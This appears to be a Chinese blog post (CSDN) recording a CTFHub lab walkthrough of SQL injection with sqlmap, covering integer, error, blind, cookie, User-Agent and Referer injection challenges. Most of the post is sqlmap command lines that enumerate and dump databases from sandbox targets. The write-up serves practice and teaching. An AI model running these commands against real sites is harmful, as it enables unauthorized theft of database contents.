sqlmap使用基本方法和具体操作流程(CTFHub演练)

最新推荐文章于 2024-06-19 23:49:54 发布
最新推荐文章于 2024-06-19 23:49:54 发布
阅读量836 收藏 28
点赞数 27
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80097039/article/details/136460982
版权

一、学习工具使用方法

先简单了解一些相关知识

对url爆破:
sqlmap -u url #判断注入点
sqlmap -u url --current-dbs #查看当前所有数据库
sqlmap -u url --current-db #查看当前数据库

sqlmap -u url -D 库名 --tables #爆表
sqlmap -u url -D 库名 -T 表名 --columns #爆字段
sqlmap -u url -D 库名 -T 表名 --C 字段名1,字段名2 --dump #爆数据
sqlmap -u url -D 库名 --dump-all #爆出数据库中所有数据
对抓取包爆破:
sqlmap -r http.txt #http.txt使我们抓取的http请求包
sqlmap -r http.txt -p username #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测

二、开始做题

1、整数型注入

这里的话我使用CTFHub进行学习,需要在kali上打开

首先输入sqlmap看看能不能用sqlmap

出现这个说明可以使用 

接下来看看是否存在sql注入漏洞。那就尝试注入一下子

sqlmap -u "网址" --current-dbs,得到库名为sqli

然后就可以爆表

sqlmap -u "网址" --batch -D sqli --tables

 发现目标flag表,直接爆字段

sqlmap -u "网址" --batch -D sqli -T flag -dump

得到flag!!!

2、字符型注入

和这个一摸一样,没什么好说的。

3、报错注入

这里将注入手写一下,加强记忆

探查是否存在注入漏洞sqlmap -u "url" --current-dbs

爆库 sqlmap -u "url" --current-db

爆表 sqlmap -u "url" --batch -D sqli --tables

爆内容 sqlmap -u "url" --batch -D sqli -T flag --dump

爆内容sqlmap -u "url" --batch -D sqli -T flag --C flag --dump

4、布尔注入

和报错注入一样的,还是写一下注入

探查  sqlmap -u "url" --current-dbs

爆库 sqlmap -u "url" --current-db

爆表 sqlmap -u "url" batch -D sqli --tables

爆内容 sqlmap -u "url" --batch -D sqli -T flag --dump

无法爆出内容,sqlmap检测到没有发现注入漏洞,真是太奇怪了 ,这个先放一放吧

5、时间盲注

爆库

sqlmap -u "http://challenge-c45464d11c028e05.sandbox.ctfhub.com:10800/?id=1" -dbs 

爆表

sqlmap -u "http://challenge-c45464d11c028e05.sandbox.ctfhub.com:10800/?id=1"  -D sqli --tables

爆内容

 sqlmap -u “http://challenge-c45464d11c028e05.sandbox.ctfhub.com:10800/?id=1"  -D sqli -T flag --dump

6、MYSQL结构

sqlmap -u  "http://challenge-df6c8ba5f13120e7.sandbox.ctfhub.com:10800/?id=1"  -dbs       

sqlmap -u  "http://challenge-df6c8ba5f13120e7.sandbox.ctfhub.com:10800/?id=1" -D sqli -tables
sqlmap -u  "http://challenge-df6c8ba5f13120e7.sandbox.ctfhub.com:10800/?id=1" -D sqli -T news -dump

sqlmap -u  "http://challenge-df6c8ba5f13120e7.sandbox.ctfhub.com:10800/?id=1" -D sqli -T  pnefvynfbk  -dump

 ctfhub{37adf932f75b13e31a906500}

7、cookie注入

这里的过关环境放在了windows上了,比较方便

burp抓包后看看cookie

然后直接开始注入,等级调到level2

python sqlmap.py -u "http://challenge-fd0c138d10c82556.sandbox.ctfhub.com:10800/" --batch --cookie " id=1; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F" --level 2 --current-db

然后直接用dump一步到位、

python sqlmap.py -u "http://challenge-fd0c138d10c82556.sandbox.ctfhub.com:10800/" --batch --cookie " id=1; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F" --level 2 -D sqli -dump

8、UA注入

python sqlmap.py -u "http://challenge-355330b091a44d9a.sandbox.ctfhub.com:10800/" --batch --level3 --current-db

python sqlmap.py -u "http://challenge-355330b091a44d9a.sandbox.ctfhub.com:10800/" --batch --level 3 -D sqli -dump

9、Refer注入

python sqlmap.py -u "http://challenge-b3ee4691d0a50ae2.sandbox.ctfhub.com:10800/" --batch --level 4 --current-db

python sqlmap.py -u "http://challenge-b3ee4691d0a50ae2.sandbox.ctfhub.com:10800/" --batch --level 4 -D sqli -dump 

足足一个小时才完成。。。记得给环境续期 

Nigoridl
关注
  • 27
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SWPUCTF 2021 新生赛 easy_sql
JasonJiao66的博客
01-28 378
当传1‘时出现报错,我们知道这是一个字符型注入,那么接下来还是先把句尾注释掉,然后使用order by语句,从1开始试,到4时开始报错,那么我们知道其有三个字段。首先打开题目,照片左上角求我们赶紧写一点东西,网站标题中则提升我们应该去传一个wllm的值,我们先给杰哥传一个1,回显正常。将1改为-1后,使用union selec,用户名与密码的位置出现了我们注入得到的2与3,表明这两个位置我们可用。接着继续加入limit n,1用group_concat()函数连接到一行显示来对库进行查询。
CTF 小白教程《从0到1:CTFer成长之路》SQL - 2 解题过程
在下小黄的博客
06-07 2407
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: 小白教程《从0到1:CTFer成长之路》结题过程 《从0到1:CTFer成长之路》书籍配套题目,点击即可打开 - 实验环境(i 春秋 需要登录) 微信公众号回复:【CTF】,即可获取本文全部涉及到的工具。 创建时间:2021年5月30日 软件: MindMaster Pro、kali 这里写目录标题CTF
【史上最全sqlmap通关sqli-labs靶场教程】
DMXA的博客
10-15 2692
【史上最全sqlmap通关sqli-labs靶场教程】
CTF-SQL注入(GET)图文讲解
weixin_45441727的博客
03-19 1183
首先进行靶机发现 netdiscover -r 靶机IP网段 发现靶机192.168.1.115 进行nmap扫描版本号 nmap -sV 192.168.1.115 扫描隐藏内容 dirb http://192.168.1.115:80 发现登录界面index.php 使用kail自带的http扫描工具owasp—zap 进入界面后输入靶机IP,点击攻击 点击警报,发现存在SQL注入 ...
网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
baimao__Ch的博客
04-23 894
1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.net/Category.php?Id=273、ctfhub在线工具:https://www.ctfhub.com/#/tools4、还有一些常用的网站字符串2进制互转:http://www.5ixuexiwang.com/str/from-binary.php。
2024年网络安全最全30 分钟快速入门 Docker 教程_30分钟掌握docker geekhour,网络安全开发入门教程
2401_84264692的博客
05-06 750
但是,我们的宿主机器会自动做端口映射,比如上面分配的端口是 32769 ,注意的是,如果关闭或者重启,这个端口就变了,那么怎么解决固定端口的问题,笔者会在后面详细剖析和带你实战。那么,如果第一次我们通过 docker pull centos:latest 拉取镜像,那么当我们执行 docker run-p80–name web-i-t centos/bin/bash 时,它就不会再去远程获取了,因为本机中已经安装该镜像,所以 Docker 会直接创建一个新的容器并启动该程序。然后,我们创建并运行一个容器。
Docker架构都不知道?这不很尴尬吗
最新发布
2301_76224593的博客
06-19 444
Docker 包括三个基本概念:Docker 使用客户端-服务器 (C/S) 架构模式,使用远程API来管理和创建Docker容器。Docker 容器通过 Docker 镜像来创建。容器与镜像的关系类似于面向对象编程中的对象与类。 主要由images、Container和Registry组成,图示如下: 1.概述: 由Linux Kernel、Base Image、自定义Image组成。Image是分层的,并且每一层都可以添加改变删除文件,成为一个新的image。不同的image可以共享相同的layer。i
网络安全最新轻量级日志系统Loki--安装配置详细教程_loki 日志
2401_84264727的博客
05-04 477
server部分定义监听端口,positions定义读取的文件偏移量存储位置,clients定义loki接口地址,最后一部分scrape_configs是重点部分。配置文件修改完成后,就可以启动promtail了,和loki启动方法一样,通过–config.file指定配置文件启动。targets 收集日志的节点,这个参数其实是在自动发现的时候使用的。labels 定义一个要收集的日志文件和一组可选的附加标签。job 标签名称,在grafana索引的时候用到的标签名称。定义日志收集的文件或路径,支持正则。
Kafka入门,这一篇就够了(安装,topic,生产者,消费者
2401_84253850的博客
04-28 931
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
sqlmap使用方法笔记
04-21
网络安全攻防工具 sqlmap 使用方法笔记,包括攻击实例和使用简介,是听课程做的笔记,适合初学者
SQLMAP使用笔记.pdf
01-25
下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP基本使用 SQLMAP基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、...
Sqlmap使用手册中文版
01-13
Sqlmap使用手册中文版 Sqlmap是十分著名的、自动化的SQL注入工具。 sqlmap简介 sqlmap支持五种不同的注入模式: 基于布尔的盲注 基于时间的盲注 基于报错注入 联合查询注入 堆叠注入 Sqlmap是开源的自动化SQL注入...
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 ...
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
打破安全设备孤岛,多源威胁检测与响应(XDR)如何构建一体化安全防线
安胜ANSCEN的博客
06-14 663
在企业常态化安全运营中,星盾多源威胁检测与响应(XDR)平台可灵活伸缩部署,融汇多源数据与能力,为安全运营团队提供统一的网络资产画像、自动化的威胁检测与响应、全面的安全态势、灵活可定义的指挥调度规范,助力企业建立高效的网络安全防御与响应体系。在网络安全防御体系的构建中,尽管部署了防火墙、入侵检测系统(IDS/IPS)、加密设备、网络流量分析工具等多种安全防御产品和措施,若这些产品之间无法进行有效的联动与协作机制,不仅降低了整体防护效果,还增加了管理的复杂性和成本。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1452
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
红队攻防渗透技术实战流程:中间件安全:IIS&NGINX&APACHE&TOMCAT
HACKONE的博客
06-15 131
当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。其2.4.0~2.4.29版本存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
sqlmap基本使用方法
08-23
下面是SQLMap基本使用方法: 1. 下载和安装:你可以从SQLMap的官方网站(https://sqlmap.org/)下载最新的版本。解压缩后,你可以直接运行sqlmap.py文件。 2. 目标URL:使用以下命令指定要测试的目标URL: ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值